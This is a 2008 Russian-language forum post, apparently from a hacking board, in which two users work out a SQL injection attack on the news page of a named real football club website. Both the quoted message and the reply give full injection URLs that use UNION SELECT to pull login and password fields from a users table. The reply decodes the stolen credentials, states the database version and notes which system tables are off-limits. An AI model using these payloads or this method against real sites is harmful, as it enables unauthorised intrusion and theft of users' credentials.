10.04.2008, 16:12
|
|
Постоянный
Регистрация: 24.02.2006
Сообщений: 447
С нами:
10636106
Репутация:
705
|
|
Сообщение от Велемир
http://www.fc-anji.ru/news.php?id=1+union+select+1,concat_ws(0x3a,login, pass),3,4,5,6+from+users/*
Та же ошибка, но вернулось всё то же самое, что и при предыдущем запросе:
void: pass ))))))
Самое интересное, что если использовать лимит и подставить 0,1 , то и вернёт void: pass.Дальше не возвращает ).Мошь он нуль и возвращает?:Р Или это какой-то новый способ защиты ?))))
Да,и вот ещё что: доступа к mysql.user и information?schema.tables нету (
все правильно при таком запросе у тя будет
http://www.fc-anji.ru/news.php?id=1+union+select+1,concat_ws(0x3b,login, pass),3,4,5,6+from+users+limit+0,1/*
void;pass -> login: void pass: pass
0x3b -> разделитель ;
больше записей в users нету поэтому пустой рез.
доступа к mysql.user и information?schema.tables нету
Версия бд 4.1.18
Ну нет доступа это обычное дело, правильно права выставлены.
|
|
|